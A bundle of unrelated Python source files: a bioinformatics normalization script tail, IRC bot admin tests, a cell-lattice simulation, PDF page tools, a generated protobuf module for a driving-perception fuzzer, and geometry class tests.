print('Time elapsed (Total) [secs]: ' + '%.3f' % time_elapsed +'\n')
elif sec_elapsed < 3600:
time_elapsed = sec_elapsed/60
print('Time elapsed (Total) [mins]: ' + '%.3f' % time_elapsed +'\n')
else:
time_elapsed = sec_elapsed/3600
print('Time elapsed (Total) [hours]: ' + '%.3f' % time_elapsed +'\n')
if __name__ == "__main__":
Normalization()
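# Hedged illustration, not part of the pipeline above: the 'size' branch follows
# the median-of-ratios idea of Love et al. (Genome Biol 2014). A minimal
# vectorized sketch of the same computation, assuming a pandas DataFrame
# `raw_counts` with one column per sample and strictly positive (pseudo-)counts:
#
#   log_counts = numpy.log(raw_counts)                    # log counts per sgRNA and sample
#   log_geomean = log_counts.mean(axis=1)                 # log geometric mean across samples
#   size_factors = numpy.exp(log_counts.sub(log_geomean, axis=0).median(axis=0))
#   normalized = raw_counts.div(size_factors, axis=1)     # divide each sample by its size-factor
#
# The names `raw_counts` and `normalized` are illustrative only; the loop-based
# code above produces the same per-sample size-factors.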
|
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
class AdminTestCase(PluginTestCase):
plugins = ('Admin',)
def testChannels(self):
def getAfterJoinMessages():
m = self.irc.takeMsg()
self.assertEqual(m.command, 'MODE')
m = self.irc.takeMsg()
self.assertEqual(m.command, 'WHO')
self.assertRegexp('channels', 'not.*in any')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#foo')
self.irc.feedMsg(ircmsgs.join('#bar', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#bar and #foo')
self.irc.feedMsg(ircmsgs.join('#Baz', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#bar, #Baz, and #foo')
def testIgnoreAddRemove(self):
self.assertNotError('admin ignore add foo!bar@baz')
self.assertError('admin ignore add alsdkfjlasd')
self.assertNotError('admin ignore remove foo!bar@baz')
self.assertError('admin ignore remove foo!bar@baz')
def testIgnoreList(self):
self.assertNotError('admin ignore list')
self.assertNotError('admin ignore add foo!bar@baz')
self.assertNotError('admin ignore list')
self.assertNotError('admin ignore add foo!bar@baz')
self.assertRegexp('admin ignore list', 'foo')
def testCapabilityAdd(self):
self.assertError('capability add foo bar')
u = ircdb.users.newUser()
u.name = 'foo'
ircdb.users.setUser(u)
self.assertNotError('capability add foo bar')
self.assertError('addcapability foo baz')
self.assert_('bar' in u.capabilities)
ircdb.users.delUser(u.id)
def testCapabilityRemove(self):
self.assertError('capability remove foo bar')
u = ircdb.users.newUser()
u.name = 'foo'
ircdb.users.setUser(u)
self.assertNotError('capability add foo bar')
self.assert_('bar' in u.capabilities)
self.assertError('removecapability foo bar')
self.assertNotError('capability remove foo bar')
self.assert_(not 'bar' in u.capabilities)
ircdb.users.delUser(u.id)
def testJoin(self):
m = self.getMsg('join #foo')
self.assertEqual(m.command, 'JOIN')
self.assertEqual(m.args[0], '#foo')
m = self.getMsg('join #foo key')
self.assertEqual(m.command, 'JOIN')
self.assertEqual(m.args[0], '#foo')
self.assertEqual(m.args[1], 'key')
def testPart(self):
def getAfterJoinMessages():
m = self.irc.takeMsg()
self.assertEqual(m.command, 'MODE')
m = self.irc.takeMsg()
self.assertEqual(m.command, 'WHO')
self.assertError('part #foo')
self.assertRegexp('part #foo', 'not in')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
m = self.getMsg('part #foo')
self.assertEqual(m.command, 'PART')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
m = self.getMsg('part #foo reason')
self.assertEqual(m.command, 'PART')
self.assertEqual(m.args[0], '#foo')
self.assertEqual(m.args[1], 'reason')
def testNick(self):
original = conf.supybot.nick()
try:
m = self.getMsg('nick foobar')
self.assertEqual(m.command, 'NICK')
self.assertEqual(m.args[0], 'foobar')
finally:
conf.supybot.nick.setValue(original)
def testAddCapabilityOwner(self):
self.assertError('admin capability add %s owner' % self.nick)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
from __future__ import absolute_import, division, print_function
import os
import sys
import uuid
import argparse
from vivarium.core.experiment import (
generate_state,
Experiment
)
from vivarium.core.composition import (
make_agents,
simulate_experiment,
plot_agents_multigen,
EXPERIMENT_OUT_DIR,
)
from vivarium.plots.multibody_physics import plot_snapshots
# compartments
from vivarium.compartments.lattice import Lattice
from vivarium.compartments.growth_division import GrowthDivision
from vivarium.compartments.growth_division_minimal import GrowthDivisionMinimal
NAME = 'lattice'
def lattice_experiment(config):
# configure the experiment
n_agents = config.get('n_agents')
emitter = config.get('emitter', {'type': 'timeseries'})
# make lattice environment
environment = Lattice(config.get('environment', {}))
network = environment.generate()
processes = network['processes']
topology = network['topology']
# add the agents
agent_ids = [str(agent_id) for agent_id in range(n_agents)]
agent_config = config['agent']
agent_compartment = agent_config['compartment']
compartment_config = agent_config['config']
agent = agent_compartment(compartment_config)
agents = make_agents(agent_ids, agent, {})
processes['agents'] = agents['processes']
topology['agents'] = agents['topology']
return Experiment({
'processes': processes,
'topology': topology,
'emitter': emitter,
'initial_state': config.get('initial_state', {})})
# configs
def get_gd_config():
return {
'compartment': GrowthDivision,
'config': {
'agents_path': ('..', '..', 'agents'),
}
}
def get_gd_minimal_config():
return {
'compartment': GrowthDivisionMinimal,
'config': {
'agents_path': ('..', '..', 'agents'),
'growth_rate': 0.03,
'growth_rate_noise': 0.02,
'division_volume': 2.6
}
}
def get_lattice_config():
bounds = [20, 20]
n_bins = [10, 10]
molecules = ['glc__D_e', 'lcts_e']
environment_config = {
'multibody': {
'bounds': bounds,
'agents': {}
},
'diffusion': {
'molecules': molecules,
'n_bins': n_bins,
'bounds': bounds,
'depth': 3000.0,
'diffusion': 1e-2,
}
}
return {
'environment': environment_config}
def run_lattice_experiment(agent_config=get_gd_minimal_config, filename='agents'):
n_agents = 1
experiment_config = get_lattice_config()
experiment_config['n_agents'] = n_agents
experiment_config['agent'] = agent_config()
experiment = lattice_experiment(experiment_config)
# simulate
settings = {
'timestep': 1,
'total_time': 200,
'return_raw_data': True}
data = simulate_experiment(experiment, settings)
# extract data
multibody_config = experiment_config['environment']['multibody']
agents = {time: time_data['agents'] for time, time_data in data.items()}
fields = {time: time_data['fields'] for time, time_data in data.items()}
# agents plot
plot_settings = {
'agents_key': 'agents'}
plot_agents_multigen(data, plot_settings, out_dir, filename)
# snapshot plot
data = {
'agents': agents,
'fields': fields,
'config': multibody_config}
plot_config = {
'out_dir': out_dir,
'filename': filename + '_snapshots'}
plot_snapshots(data, plot_config)
if __name__ == '__main__':
out_dir = os.path.join(EXPERIMENT_OUT_DIR, NAME)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
parser = argparse.ArgumentParser(description='lattice_experiment')
parser.add_argument('--gd', '-g', action='store_true', default=False)
parser.add_argument('--gd_minimal', '-m', action='store_true', default=False)
args = parser.parse_args()
no_args = (len(sys.argv) == 1)
if args.gd_minimal or no_args:
run_lattice_experiment(get_gd_minimal_config, 'minimal_growth_division')
elif args.gd:
run_lattice_experiment(get_gd_config, 'growth_division')
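# Hedged usage sketch (the module file name below is an assumption): the argparse
# block above selects the agent compartment, so typical invocations are
#
#   python lattice_experiment.py --gd_minimal   # minimal growth/division agents (also the default)
#   python lattice_experiment.py --gd           # full growth/division agents
#
# Programmatically, the same flow is roughly:
#
#   config = get_lattice_config()
#   config['n_agents'] = 1
#   config['agent'] = get_gd_minimal_config()
#   experiment = lattice_experiment(config)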
|
# -*- coding: utf-8 -*-
"""Toolcall exception hierarchy.
"""
class ToolcallException(Exception):
"""Toolcall exception base class.
"""
class ToolcallInvalidResponse(ToolcallException):
"""Something other than a 200 OK response.
"""
class ToolcallJSonDecodeError(ToolcallException):
"""Couldn't decode json value.
"""
class ToolcallMessageException(ToolcallException):
"""Generic message error.
"""
class ToolcallResultException(ToolcallMessageException):
"""Something is wrong with the result.
"""
|
"""Module containing the actual commands stapler understands."""
import math
import os
try:
from PyPDF2 import PdfFileWriter, PdfFileReader
except ImportError:  # fall back to the legacy pyPdf package
from pyPdf import PdfFileWriter, PdfFileReader
import more_itertools
from . import CommandError, iohelper
import staplelib
def select(args, inverse=False, even_page=False):
"""
Concatenate files / select pages from files.
inverse=True excludes rather than includes the selected pages from
the file.
even_page=True inserts an empty page at the end of each input
file if it ends with an odd page number.
"""
filesandranges = iohelper.parse_ranges(args[:-1])
outputfilename = args[-1]
verbose = staplelib.OPTIONS.verbose
if not filesandranges or not outputfilename:
raise CommandError("Both input and output filenames are required.")
output = PdfFileWriter()
pagecnt = 0
try:
for input in filesandranges:
pdf = input['pdf']
if verbose:
print input['name']
# empty range means "include all pages"
if not inverse:
pagerange = input['pages'] or [
(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1)]
else:
excluded = [p for p, r in input['pages']]
pagerange = [(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1) if
p not in excluded]
for pageno, rotate in pagerange:
if 1 <= pageno <= pdf.getNumPages():
if verbose:
print "Using page: {} (rotation: {} deg.)".format(
pageno, rotate)
page = pdf.getPage(pageno-1)
output.addPage(page.rotateClockwise(rotate))
pagecnt += 1
else:
raise CommandError("Page {} not found in {}.".format(
pageno, input['name']))
if even_page:
if pagecnt % 2 == 1:
output.addPage(iohelper.create_empty_page(page))
pagecnt += 1
except Exception, e:
raise CommandError(e)
if os.path.isabs(outputfilename):
iohelper.write_pdf(output, outputfilename)
else:
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputfilename)
def select_even(args, inverse=False):
"""
Concatenate files / select pages from files.
Inserts an empty page at the end of each input file if it ends with
an odd page number.
"""
select(args, inverse, True)
def delete(args):
"""Concatenate files and remove pages from files."""
return select(args, inverse=True)
def split(args):
"""Burst an input file into one file per page."""
files = args
verbose = staplelib.OPTIONS.verbose
if not files:
raise CommandError("No input files specified.")
inputs = []
try:
for f in files:
inputs.append(iohelper.read_pdf(f))
except Exception, e:
raise CommandError(e)
filecount = 0
pagecount = 0
for input in inputs:
# zero-padded output file name
(base, ext) = os.path.splitext(os.path.basename(files[filecount]))
output_template = ''.join([
base,
'_',
'%0',
            str(int(math.log10(input.getNumPages())) + 1),  # digits needed for zero-padding
'd',
ext
])
for pageno in range(input.getNumPages()):
output = PdfFileWriter()
output.addPage(input.getPage(pageno))
outputname = output_template % (pageno + 1)
if verbose:
print outputname
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputname)
pagecount += 1
filecount += 1
if verbose:
print "\n{} page(s) in {} file(s) processed.".format(
pagecount, filecount)
def info(args):
"""Display Metadata content for all input files."""
files = args
if not files:
raise CommandError("No input files specified.")
for f in files:
pdf = iohelper.read_pdf(f)
print "*** Metadata for {}".format(f)
print
info = pdf.documentInfo
if info:
for name, value in info.items():
print u" {}: {}".format(name, value)
else:
print " (No metadata found.)"
print
def zip(args):
"""Combine 2 files with interleaved pages."""
filesandranges = iohelper.parse_ranges(args[:-1])
outputfilename = args[-1]
verbose = staplelib.OPTIONS.verbose
if not filesandranges or not outputfilename:
raise CommandError('Both input and output filenames are required.')
# Make [[file1_p1, file1_p2], [file2_p1, file2_p2], ...].
filestozip = []
for input in filesandranges:
pdf = input['pdf']
if verbose:
print input['name']
# Empty range means "include all pages".
pagerange = input['pages'] or [
(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1)]
pagestozip = []
for pageno, rotate in pagerange:
if 1 <= pageno <= pdf.getNumPages():
if verbose:
print "Using page: {} (rotation: {} deg.)".format(
pageno, rotate)
pagestozip.append(
pdf.getPage(pageno - 1).rotateClockwise(rotate))
else:
raise CommandError("Page {} not found in {}.".format(
pageno, input['name']))
filestozip.append(pagestozip)
# Interweave pages.
output = PdfFileWriter()
for page in more_itertools.roundrobin(*filestozip):
output.addPage(page)
if os.path.isabs(outputfilename):
iohelper.write_pdf(output, outputfilename)
else:
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputfilename)
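# Hedged usage sketch: these commands are normally dispatched by the stapler CLI,
# which parses options and fills staplelib.OPTIONS (verbose flag, destination
# directory) before calling them.  Assuming the usual sub-command names (an
# assumption about the CLI layer, which lives outside this module):
#
#   stapler sel   in.pdf 1-10 other.pdf 2 out.pdf   # select(): pick pages / concatenate
#   stapler del   in.pdf 4-6 out.pdf                # delete(): drop the listed pages
#   stapler split in.pdf                            # split(): one output file per page
#   stapler zip   odd.pdf even.pdf out.pdf          # zip(): interleave pages of two files
#
# Calling select(args) and friends directly also works, but only after
# staplelib.OPTIONS has been initialized.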
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: modules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from modules.drivers.proto import mobileye_pb2 as modules_dot_drivers_dot_proto_dot_mobileye__pb2
from modules.canbus.proto import chassis_pb2 as modules_dot_canbus_dot_proto_dot_chassis__pb2
from modules.drivers.proto import delphi_esr_pb2 as modules_dot_drivers_dot_proto_dot_delphi__esr__pb2
from modules.drivers.proto import conti_radar_pb2 as modules_dot_drivers_dot_proto_dot_conti__radar__pb2
from modules.localization.proto import localization_pb2 as modules_dot_localization_dot_proto_dot_localization__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='modules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto',
package='apollo.tools.fuzz.third_party_perception',
syntax='proto2',
serialized_pb=_b('\nQmodules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto\x12(apollo.tools.fuzz.third_party_perception\x1a$modules/drivers/proto/mobileye.proto\x1a\"modules/canbus/proto/chassis.proto\x1a&modules/drivers/proto/delphi_esr.proto\x1a\'modules/drivers/proto/conti_radar.proto\x1a-modules/localization/proto/localization.proto\"\xa0\x02\n\x1fThirdPartyPerceptionFuzzMessage\x12*\n\x08mobileye\x18\x01 \x02(\x0b\x32\x18.apollo.drivers.Mobileye\x12\'\n\x07\x63hassis\x18\x02 \x02(\x0b\x32\x16.apollo.canbus.Chassis\x12-\n\ndelphi_esr\x18\x03 \x02(\x0b\x32\x19.apollo.drivers.DelphiESR\x12/\n\x0b\x63onti_radar\x18\x04 \x02(\x0b\x32\x1a.apollo.drivers.ContiRadar\x12H\n\x15localization_estimate\x18\x05 \x02(\x0b\x32).apollo.localization.LocalizationEstimate')
,
dependencies=[modules_dot_drivers_dot_proto_dot_mobileye__pb2.DESCRIPTOR,modules_dot_canbus_dot_proto_dot_chassis__pb2.DESCRIPTOR,modules_dot_drivers_dot_proto_dot_delphi__esr__pb2.DESCRIPTOR,modules_dot_drivers_dot_proto_dot_conti__radar__pb2.DESCRIPTOR,modules_dot_localization_dot_proto_dot_localization__pb2.DESCRIPTOR,])
_THIRDPARTYPERCEPTIONFUZZMESSAGE = _descriptor.Descriptor(
name='ThirdPartyPerceptionFuzzMessage',
full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobileye', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.mobileye', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chassis', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.chassis', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delphi_esr', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.delphi_esr', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conti_radar', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.conti_radar', index=3,
number=4, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='localization_estimate', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.localization_estimate', index=4,
number=5, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=330,
serialized_end=618,
)
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['mobileye'].message_type = modules_dot_drivers_dot_proto_dot_mobileye__pb2._MOBILEYE
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['chassis'].message_type = modules_dot_canbus_dot_proto_dot_chassis__pb2._CHASSIS
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['delphi_esr'].message_type = modules_dot_drivers_dot_proto_dot_delphi__esr__pb2._DELPHIESR
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['conti_radar'].message_type = modules_dot_drivers_dot_proto_dot_conti__radar__pb2._CONTIRADAR
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['localization_estimate'].message_type = modules_dot_localization_dot_proto_dot_localization__pb2._LOCALIZATIONESTIMATE
DESCRIPTOR.message_types_by_name['ThirdPartyPerceptionFuzzMessage'] = _THIRDPARTYPERCEPTIONFUZZMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ThirdPartyPerceptionFuzzMessage = _reflection.GeneratedProtocolMessageType('ThirdPartyPerceptionFuzzMessage', (_message.Message,), dict(
DESCRIPTOR = _THIRDPARTYPERCEPTIONFUZZMESSAGE,
__module__ = 'modules.tools.fuzz.third_party_perception.proto.third_party_perception_fuzz_pb2'
# @@protoc_insertion_point(class_scope:apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage)
))
_sym_db.RegisterMessage(ThirdPartyPerceptionFuzzMessage)
# @@protoc_insertion_point(module_scope)
|
import math
from TestKit import *
from UnderGUI.Commons import *
__all__ = ['test_commons']
def test_commons():
### Pos ###
pos = Pos(1, 2)
assert pos.x == 1 and pos.y == 2
assert Pos(1, 2) == Pos(1, 2)
assert (Pos(1, 2) == Pos(1, 3)) == False
assert (Pos(1, 2) == Pos(5, 2)) == False
assert (Pos(1, 2) == Pos(2, 1)) == False
assert (Pos(1, 2) != Pos(1, 2)) == False
assert Pos(1, 2) != Pos(1, 3)
assert Pos(1, 2) != Pos(5, 2)
assert Pos(1, 2) != Pos(2, 1)
assert Pos(2, 3) * Pos(10, 100) == Pos(20, 300)
assert Pos(20, 300) / Pos(10, 100) == Pos(2, 3)
assert Pos(40, 50) + Pos(1, 2) == Pos(41, 52)
assert Pos(40, 50) - Pos(1, 2) == Pos(39, 48)
assert Pos(20, 30) / 10 == Pos(2, 3)
assert Pos(2, 3) * 10 == Pos(20, 30)
assert Pos(40, 50) + 2 == Pos(42, 52)
assert Pos(40, 50) - 2 == Pos(38, 48)
assert (Pos(2, 5) < Pos(3, 6)) == True
assert (Pos(2, 5) < Pos(2, 6)) == False
assert (Pos(2, 5) < Pos(3, 5)) == False
assert (Pos(2, 5) < Pos(2, 5)) == False
assert (Pos(2, 5) < Pos(1, 5)) == False
assert (Pos(2, 5) < Pos(2, 4)) == False
assert (Pos(2, 5) < Pos(1, 4)) == False
assert (Pos(2, 5) <= Pos(3, 6)) == True
assert (Pos(2, 5) <= Pos(2, 6)) == True
assert (Pos(2, 5) <= Pos(3, 5)) == True
assert (Pos(2, 5) <= Pos(2, 5)) == True
assert (Pos(2, 5) <= Pos(1, 5)) == False
assert (Pos(2, 5) <= Pos(2, 4)) == False
assert (Pos(2, 5) <= Pos(1, 4)) == False
assert (Pos(3, 6) > Pos(2, 5)) == True
assert (Pos(3, 6) > Pos(3, 5)) == False
assert (Pos(3, 6) > Pos(2, 6)) == False
assert (Pos(3, 6) > Pos(3, 6)) == False
assert (Pos(3, 6) > Pos(3, 7)) == False
assert (Pos(3, 6) > Pos(4, 6)) == False
assert (Pos(3, 6) > Pos(4, 7)) == False
assert (Pos(3, 6) >= Pos(2, 5)) == True
assert (Pos(3, 6) >= Pos(3, 5)) == True
assert (Pos(3, 6) >= Pos(2, 6)) == True
assert (Pos(3, 6) >= Pos(3, 6)) == True
assert (Pos(3, 6) >= Pos(3, 7)) == False
assert (Pos(3, 6) >= Pos(4, 6)) == False
assert (Pos(3, 6) >= Pos(4, 7)) == False
### Size ###
size = Size(1, 2)
assert size.width == 1 and size.height == 2
assert Size(1, 2) == Size(1, 2)
assert (Size(1, 2) == Size(1, 3)) == False
assert (Size(1, 2) == Size(5, 2)) == False
assert (Size(1, 2) == Size(2, 1)) == False
assert (Size(1, 2) != Size(1, 2)) == False
assert Size(1, 2) != Size(1, 3)
assert Size(1, 2) != Size(5, 2)
assert Size(1, 2) != Size(2, 1)
assert Size(2, 3) * Size(10, 100) == Size(20, 300)
assert Size(20, 300) / Size(10, 100) == Size(2, 3)
assert Size(40, 50) + Size(1, 2) == Size(41, 52)
assert Size(40, 50) - Size(1, 2) == Size(39, 48)
assert Size(20, 30) / 10 == Size(2, 3)
assert Size(2, 3) * 10 == Size(20, 30)
assert Size(40, 50) + 2 == Size(42, 52)
assert Size(40, 50) - 2 == Size(38, 48)
assert (Size(2, 5) < Size(3, 6)) == True
assert (Size(2, 5) < Size(2, 6)) == False
assert (Size(2, 5) < Size(3, 5)) == False
assert (Size(2, 5) < Size(2, 5)) == False
assert (Size(2, 5) < Size(1, 5)) == False
assert (Size(2, 5) < Size(2, 4)) == False
assert (Size(2, 5) < Size(1, 4)) == False
assert (Size(2, 5) <= Size(3, 6)) == True
assert (Size(2, 5) <= Size(2, 6)) == True
assert (Size(2, 5) <= Size(3, 5)) == True
assert (Size(2, 5) <= Size(2, 5)) == True
assert (Size(2, 5) <= Size(1, 5)) == False
assert (Size(2, 5) <= Size(2, 4)) == False
assert (Size(2, 5) <= Size(1, 4)) == False
assert (Size(3, 6) > Size(2, 5)) == True
assert (Size(3, 6) > Size(3, 5)) == False
assert (Size(3, 6) > Size(2, 6)) == False
assert (Size(3, 6) > Size(3, 6)) == False
assert (Size(3, 6) > Size(3, 7)) == False
assert (Size(3, 6) > Size(4, 6)) == False
assert (Size(3, 6) > Size(4, 7)) == False
assert (Size(3, 6) >= Size(2, 5)) == True
assert (Size(3, 6) >= Size(3, 5)) == True
assert (Size(3, 6) >= Size(2, 6)) == True
assert (Size(3, 6) >= Size(3, 6)) == True
assert (Size(3, 6) >= Size(3, 7)) == False
assert (Size(3, 6) >= Size(4, 6)) == False
assert (Size(3, 6) >= Size(4, 7)) == False
### Pos and Size ###
assert Pos(2, 3) * Size(10, 100) == Pos(20, 300)
assert Pos(20, 300) / Size(10, 100) == Pos(2, 3)
assert Pos(40, 50) + Size(1, 2) == Pos(41, 52)
assert Pos(40, 50) - Size(1, 2) == Pos(39, 48)
assert Pos(1, 2).to_size() == Size(1, 2)
assert Size(1, 2).to_pos() == Pos(1, 2)
### Range ###
range = Range(1, 2, 3, 4)
assert range.x1 == 1 and range.y1 == 2 and range.x2 == 3 and range.y2 == 4
assert range.get_from_pos() == Pos(1, 2)
assert range.get_to_pos() == Pos(3, 4)
assert Range(0, 1, 2, 3) == Range(0, 1, 2, 3)
assert (Range(0, 1, 2, 3) == Range(10, 1, 2, 3)) == False
assert (Range(0, 1, 2, 3) == Range(0, 11, 2, 3)) == False
assert (Range(0, 1, 2, 3) == Range(1, 1, 12, 3)) == False
assert (Range(0, 1, 2, 3) == Range(1, 1, 2, 13)) == False
assert (Range(0, 1, 2, 3) != Range(0, 1, 2, 3)) == False
assert Range(0, 1, 2, 3) != Range(10, 1, 2, 3)
assert Range(0, 1, 2, 3) != Range(0, 11, 2, 3)
assert Range(0, 1, 2, 3) != Range(1, 1, 12, 3)
assert Range(0, 1, 2, 3) != Range(1, 1, 2, 13)
assert (Range(5, 2, 3, 4) * Range(10, 100, 1000, 10000)) == Range(50, 200, 3000, 40000)
assert (Range(6, 20, 60, 3000) / Range(2, 5, 10, 100)) == Range(3, 4, 6, 30)
assert (Range(6.0, 20.0, 60.0, 3000.0) / Range(2.0, 5.0, 10.0, 100.0)) == Range(3.0, 4.0, 6.0, 30.0)
assert (Range(5, 2, 3, 4) + Range(10, 100, 1000, 10000)) == Range(15, 102, 1003, 10004)
assert (Range(10, 20, 30, 40) - Range(1, 2, 3, 4)) == Range(9, 18, 27, 36)
assert (Range(1, 2, 3, 4) * 10) == Range(10, 20, 30, 40)
assert (Range(10, 20, 30, 40) / 10) == Range(1, 2, 3, 4)
assert (Range(10.0, 20.0, 30.0, 40.0) / 10.0) == Range(1.0, 2.0, 3.0, 4.0)
assert (Range(1, 2, 3, 4) + 10) == Range(11, 12, 13, 14)
assert (Range(10, 20, 30, 40) - 1) == Range(9, 19, 29, 39)
assert Range(3, 5, 10, 20).is_in(Pos(3, 5)) == True
assert Range(3, 5, 10, 20).is_in(Pos(4, 6)) == True
assert Range(3, 5, 10, 20).is_in(Pos(9, 19)) == True
assert Range(3, 5, 10, 20).is_in(Pos(2, 5)) == False
assert Range(3, 5, 10, 20).is_in(Pos(3, 4)) == False
assert Range(3, 5, 10, 20).is_in(Pos(2, 4)) == False
assert Range(3, 5, 10, 20).is_in(Pos(9, 20)) == False
assert Range(3, 5, 10, 20).is_in(Pos(10, 19)) == False
assert Range(3, 5, 10, 20).is_in(Pos(10, 20)) == False
assert RangeF(0, 1, 2, 3) == Range(0.0, 1.0, 2.0, 3.0)
assert RangeI(0.1, 1.1, 2.1, 3.1) == Range(0, 1, 2, 3)
assert RangePP(Pos(0, 1), Pos(2, 3)) == Range(0, 1, 2, 3)
assert RangeF(0.1, 1.1, 2.1, 3.1).to_range_i() == RangeI(0, 1, 2, 3)
assert RangeI(0, 1, 2, 3).to_range_f() == RangeF(0, 1, 2, 3)
assert Range(10, 20, 30, 40) / Size(10, 5) == Range(1, 4, 3, 8)
assert Range(10, 20, 30, 40).get_normalized(10, 5) == Range(1, 4, 3, 8)
assert Range(10, 20, 30, 40).get_normalized_s(Size(10, 5)) == Range(1, 4, 3, 8)
assert Range(1, 2, 3, 4).to_tuple() == (1, 2, 3, 4)
assert Range(1, 2, 3, 4).to_dict() == {'x1' : 1, 'y1' : 2, 'x2' : 3, 'y2' : 4}
range = Range(1, 2, 3, 4)
range.flip_on_x_axis(10)
assert range == Range(1, 6, 3, 8)
range.flip_on_y_axis(10)
assert range == Range(7, 6, 9, 8)
### Area ###
area = Area(1, 2, 3, 4)
assert area.x == 1 and area.y == 2 and area.width == 3 and area.height == 4
assert area.get_pos() == Pos(1, 2)
assert area.get_size() == Size(3, 4)
area.set_pos(Pos(10, 20))
assert area.x == 10 and area.y == 20 and area.width == 3 and area.height == 4
area.set_size(Size(30, 40))
assert area.x == 10 and area.y == 20 and area.width == 30 and area.height == 40
assert Area(0, 1, 2, 3) == Area(0, 1, 2, 3)
assert (Area(0, 1, 2, 3) == Area(10, 1, 2, 3)) == False
assert (Area(0, 1, 2, 3) == Area(0, 11, 2, 3)) == False
assert (Area(0, 1, 2, 3) == Area(1, 1, 12, 3)) == False
assert (Area(0, 1, 2, 3) == Area(1, 1, 2, 13)) == False
assert (Area(0, 1, 2, 3) != Area(0, 1, 2, 3)) == False
assert Area(0, 1, 2, 3) != Area(10, 1, 2, 3)
assert Area(0, 1, 2, 3) != Area(0, 11, 2, 3)
assert Area(0, 1, 2, 3) != Area(1, 1, 12, 3)
assert Area(0, 1, 2, 3) != Area(1, 1, 2, 13)
